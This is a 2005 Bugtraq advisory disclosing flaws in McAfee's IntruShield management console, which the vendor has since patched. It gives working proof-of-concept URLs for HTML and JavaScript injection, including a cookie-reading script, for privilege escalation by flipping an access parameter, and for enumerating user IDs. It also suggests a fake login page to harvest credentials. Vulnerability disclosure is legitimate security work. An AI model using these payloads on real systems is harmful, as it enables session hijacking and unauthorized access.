[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    McAfee Intrushield IPS Abuse
From:       c0ntexb () gmail ! com
Date:       2005-07-06 15:03:06
Message-ID: 20050706150306.28631.qmail () securityfocus ! com
[Download RAW message or body]

 /*
  *****************************************************************************************************************
  $ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
  *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 06 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Local / Remote
  *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *****************************************************************************************************************


  McAfee IntruShield Security Management System
  http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm


  "The McAfee IntruShield Security Management System is an advanced solution for \
administering IntruShield  sensor appliance deployments. The IntruShield Security \
Management System (ISM) can support both large and  small network intrusion \
prevention system (IPS) deployments and can scale up to several hundred sensor  \
appliances. By integrating a comprehensive set of Best-in-Class security management \
functions, the  IntruShield Security Management System dramatically simplifies and \
streamlines the complexities associated  with IPS configuration, policy compliance, \
and threat and response management."

  I have found some security vulnerabilities in this product whereby a user can \
elevate their privileges from  a user that can only view alerts logged by remote \
sensors, to a scenario where the user can gain access to  acknowledge, accept and \
delete alerts and access the Management Console. It is also possible to inject  \
malicious HTML and JavaScript into the URLS and have this malicious script run on the \
clients machine,  allowing for account information hijacking.

  A new version has been released to address these bugs and can be downloaded from \
their site.

*/

  Issues:
  1) Inject HTML
  2) Inject JavaScript
  3) Access privileged reports
  4) Acknowledge and delete alerts
  5) Gain access to Management Console

  Note: for issues 1 - 4, the attacker needs a valid user account.

  1) It is possible to embed HTML into the MISMS. This could potentially allow \
phishing attacks to be performed  against a valid Manager account.

  https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
  domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&
  topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="
  http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600 \
>  </iframe>&severity=critical&count=1


  2) It is possible to embed JavaScript into the MISMS and have the embedded script \
execute in the security  context of the user browsing the Management System.

  https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
  domainName=Demo&resourceName=<script>alert("There could be trouble  \
ahead")</script><script>alert(document.cookie)  \
</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=
  Critical&severity=critical&count=1


  3) It is possible to access the restricted "Generate Reports" section of the MISMS \
and as such, a non-privileged  user can gain important information regarding the \
configuration and set-up of the IP devices being managed by the  Service. This can be \
achieved by simply changing the Access option from false to true.

  https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&
  selectedDomain=0&fullAccessRight=true


  4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS \
console by modifying URL's  sent to the system by simply changing the Access option \
from false to true.

  https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&
  domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&
  topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=
  critical&count=1

  Each change is emailed out to the administrator, however the email only says that \
"someone" made a change.

  5) As default, all user ID values are passed in the URL in the clear, meaning that \
it is trivial for an attacker  to brute force accounts until a privileged Manager \
account is found. An example of this would look similar to:

  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
  https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

  This process can be continued until a valid user ID has been found with privileges \
to access the configure screen.

  Since javascript can be run in the browsers of clients accessing the device, it \
would be possible to redraw the page  with IFRAME's and recreate the user login page \
to snoop usersnames and passwords.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic